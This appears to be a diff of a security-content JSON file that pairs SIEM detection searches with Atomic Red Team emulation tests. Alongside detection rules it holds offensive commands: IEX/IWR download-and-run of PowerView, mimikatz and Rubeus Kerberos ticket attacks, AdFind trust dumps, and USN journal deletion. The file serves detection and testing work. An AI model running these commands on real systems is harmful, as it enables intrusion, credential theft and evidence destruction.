"Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } } ], "external_reference": [ @@ -386259,7 +390403,7 @@ { "name": "ETW Registry Disabled", "description": "This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", "tags": { "name": "ETW Registry Disabled", "analytic_story": [ @@ -386276,7 +390420,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.006", "T1127", @@ -387072,11 +391216,11 @@ "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", "nltest /domain_trusts\nnltest /trusted_domains\n", "Import-Module \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=organizationalUnit)\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -gcb -sc trustdmp\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=organizationalUnit)\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -gcb -sc trustdmp\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", - "\\..\\ExternalPayloads\\TruffleSnout.exe forest -n %userdomain%\n\\..\\ExternalPayloads\\TruffleSnout.exe domain -n %userdomain%\n", + "\"\\..\\ExternalPayloads\\TruffleSnout.exe\" forest -n %userdomain%\n\"\\..\\ExternalPayloads\\TruffleSnout.exe\" domain -n %userdomain%\n", "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n" ], "commands": [], @@ -387248,7 +391392,7 @@ "dependencies": [ { "description": "PowerView PowerShell script must exist on disk\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PowerView.ps1\"\n" }, { @@ -387273,12 +391417,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=organizationalUnit)\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=organizationalUnit)\n", "name": "command_prompt" } }, @@ -387293,12 +391437,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -gcb -sc trustdmp\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -gcb -sc trustdmp\n", "name": "command_prompt" } }, @@ -387349,12 +391493,12 @@ "dependencies": [ { "description": "TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})\n", - "prereq_command": "if (Test-Path #{trufflesnout_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{trufflesnout_path}) -Force | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe\" -OutFile #{trufflesnout_path}\n" + "prereq_command": "if (Test-Path \"#{trufflesnout_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{trufflesnout_path}\") -Force | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe\" -OutFile \"#{trufflesnout_path}\"\n" } ], "executor": { - "command": "#{trufflesnout_path} forest -n #{domain}\n#{trufflesnout_path} domain -n #{domain}\n", + "command": "\"#{trufflesnout_path}\" forest -n #{domain}\n\"#{trufflesnout_path}\" domain -n #{domain}\n", "name": "command_prompt" } } @@ -387673,7 +391817,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -387845,7 +391989,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -388162,7 +392306,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -388198,7 +392342,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -388473,7 +392617,7 @@ { "name": "DSQuery Domain Discovery", "description": "The following analytic identifies \"dsquery.exe\" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary perform domain trust discovery. Note that this query does not identify any other variations of \"Dsquery.exe\" usage.\\\nWithin this detection, it is assumed `dsquery.exe` is not moved or renamed.\\\nThe search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"dsquery.exe\" and its parent process.\\\nDSQuery.exe is natively found in `C:\\Windows\\system32` and `C:\\Windows\\syswow64` and only on Server operating system.\\\nThe following DLL(s) are loaded when DSQuery.exe is launched `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\\\nIn addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dsquery_domain_discovery_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dsquery_domain_discovery_filter`", "tags": { "name": "DSQuery Domain Discovery", "analytic_story": [ @@ -388606,7 +392750,7 @@ { "name": "Get-DomainTrust with PowerShell Script Block", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \\\nThis analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \\\nDuring triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-domaintrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_script_block_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-domaintrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_script_block_filter`", "tags": { "name": "Get-DomainTrust with PowerShell Script Block", "analytic_story": [ @@ -388619,7 +392763,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Suspicious PowerShell Get-DomainTrust was identified on endpoint $Computer$ by user $UserID$.", + "message": "Suspicious PowerShell Get-DomainTrust was identified on endpoint $dest$ by user $user$.", "mitre_attack_id": [ "T1482" ], @@ -388628,25 +392772,18 @@ ], "observable": [ { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] } ], "risk_score": 12, @@ -388731,7 +392868,7 @@ { "name": "Get-ForestTrust with PowerShell Script Block", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \\\nThis analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \\\nDuring triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-foresttrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*get-foresttrust*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_script_block_filter`", "tags": { "name": "Get-ForestTrust with PowerShell Script Block", "analytic_story": [ @@ -388745,7 +392882,7 @@ "Exploitation", "Installation" ], - "message": "Suspicious PowerShell Get-ForestTrust was identified on endpoint $Computer$ by user $UserID$.", + "message": "Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$.", "mitre_attack_id": [ "T1482", "T1059.001" @@ -388755,14 +392892,14 @@ ], "observable": [ { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -392246,7 +396383,7 @@ { "name": "Detect RClone Command-Line Usage", "description": "This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by review file modifications and parallel processes.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process IN (\"*copy*\", \"*mega*\", \"*pcloud*\", \"*ftp*\", \"*--config*\", \"*--progress*\", \"*--no-check-certificate*\", \"*--ignore-existing*\", \"*--auto-confirm*\", \"*--transfers*\", \"*--multi-thread-streams*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rclone_command_line_usage_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process IN (\"*copy*\", \"*mega*\", \"*pcloud*\", \"*ftp*\", \"*--config*\", \"*--progress*\", \"*--no-check-certificate*\", \"*--ignore-existing*\", \"*--auto-confirm*\", \"*--transfers*\", \"*--multi-thread-streams*\") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rclone_command_line_usage_filter`", "tags": { "name": "Detect RClone Command-Line Usage", "analytic_story": [ @@ -392921,7 +397058,7 @@ { "name": "AWS Network Access Control List Deleted", "description": "Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs.", - "search": "`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`", + "search": "`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`", "tags": { "name": "AWS Network Access Control List Deleted", "analytic_story": [ @@ -394083,6 +398220,7 @@ ], "command_list": [ "fsutil usn deletejournal /D C:\n", + "if (-not (Test-Path \"\\..\\ExternalPayloads\\T1070-2.txt\")) { New-Item \"\\..\\ExternalPayloads\\T1070-2.txt\" -Force } \necho \"1234567890\" > \"\\..\\ExternalPayloads\\T1070-2.txt\"\nfsutil file setZeroData offset=0 length=10 \"\\..\\ExternalPayloads\\T1070-2.txt\"\n", "powershell/credentials/mimikatz/purge", "powershell/management/lock", "powershell/management/logoff", @@ -394456,6 +398594,32 @@ "name": "command_prompt", "elevation_required": true } + }, + { + "name": "Indicator Manipulation using FSUtil", + "auto_generated_guid": "96e86706-6afd-45b6-95d6-108d23eaf2e9", + "description": "Finds a file by user name (if Disk Quotas are enabled), queries allocated ranges for a file, sets a file's short name, sets a file's valid data length, sets zero data for a file, or creates a new file. Upon execution, no output\nwill be displayed. More information about fsutil can be found at https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file\n- https://tria.ge/230601-x8x6bsgb24/behavioral2\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_manipulate": { + "description": "Path of file to manipulate", + "type": "path", + "default": "PathToAtomicsFolder\\..\\ExternalPayloads\\T1070-2.txt" + }, + "file_data_length": { + "description": "Data length to setzero", + "type": "integer", + "default": 10 + } + }, + "executor": { + "command": "if (-not (Test-Path \"#{file_to_manipulate}\")) { New-Item \"#{file_to_manipulate}\" -Force } \necho \"1234567890\" > \"#{file_to_manipulate}\"\nfsutil file setZeroData offset=0 length=#{file_data_length} \"#{file_to_manipulate}\"\n", + "cleanup_command": "rm \"#{file_to_manipulate}\"\n", + "name": "powershell", + "elevation_required": false + } } ] } @@ -396043,7 +400207,7 @@ { "name": "Create or delete windows shares using net exe", "description": "This search looks for the creation or deletion of hidden shares using net.exe.", - "search": "| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` ", + "search": "| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` ", "tags": { "name": "Create or delete windows shares using net exe", "analytic_story": [ @@ -397485,7 +401649,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The Windows Event Log Service shutdown on $ComputerName$", + "message": "The Windows Event Log Service shutdown on $dest$", "mitre_attack_id": [ "T1070", "T1070.001" @@ -397495,7 +401659,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -397572,7 +401736,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -401274,8 +405438,8 @@ } ], "command_list": [ - "\\..\\ExternalPayloads\\bin\\x64\\mimikatz.exe \"kerberos::ptt #{ticket}\"\n", - "& \"\\..\\ExternalPayloads\\PsExec.exe\" -accepteula \\\\localhost -w c:\\ -c \"\\..\\ExternalPayloads\\rubeus.exe\" asktgt /user:Administrator /password:Password /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location \\..\\ExternalPayloads\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"\\..\\ExternalPayloads\\rubeus.exe\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item \\..\\ExternalPayloads\\ticket.kirbi\n& \"\\..\\ExternalPayloads\\rubeus.exe\" purge " + "\"\\..\\ExternalPayloads\\bin\\x64\\mimikatz.exe\" \"kerberos::ptt #{ticket}\"\n", + "& \"\\..\\ExternalPayloads\\PsExec.exe\" -accepteula \\\\localhost -w c:\\ -c \"\\..\\ExternalPayloads\\rubeus.exe\" asktgt /user:Administrator /password:Password /domain:$Env:USERDOMAIN /outfile:ticket.kirbi\nSet-Location \"\\..\\ExternalPayloads\"\nMove-Item -Force \"\\\\localhost\\c$\\ticket.kirbi\" ticket.kirbi\nWrite-Host \"Successfully retrieved TGT from 'localhost', now requesting a TGS from local\"\n& \"\\..\\ExternalPayloads\\rubeus.exe\" asktgs /service:cifs/localhost /ticket:ticket.kirbi /ptt\nRemove-Item \"\\..\\ExternalPayloads\\ticket.kirbi\"\n& \"\\..\\ExternalPayloads\\rubeus.exe\" purge " ], "commands": [], "queries": [], @@ -401310,12 +405474,12 @@ "dependencies": [ { "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", - "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path #{mimikatz_exe} | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" + "prereq_command": "if (Test-Path \"#{mimikatz_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path \"#{mimikatz_exe}\" | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" } ], "executor": { - "command": "#{mimikatz_exe} \"kerberos::ptt #{ticket}\"\n", + "command": "\"#{mimikatz_exe}\" \"kerberos::ptt #{ticket}\"\n", "name": "command_prompt" } }, @@ -401363,13 +405527,13 @@ { "description": "PsExec must exist on disk at \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\"\n", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" 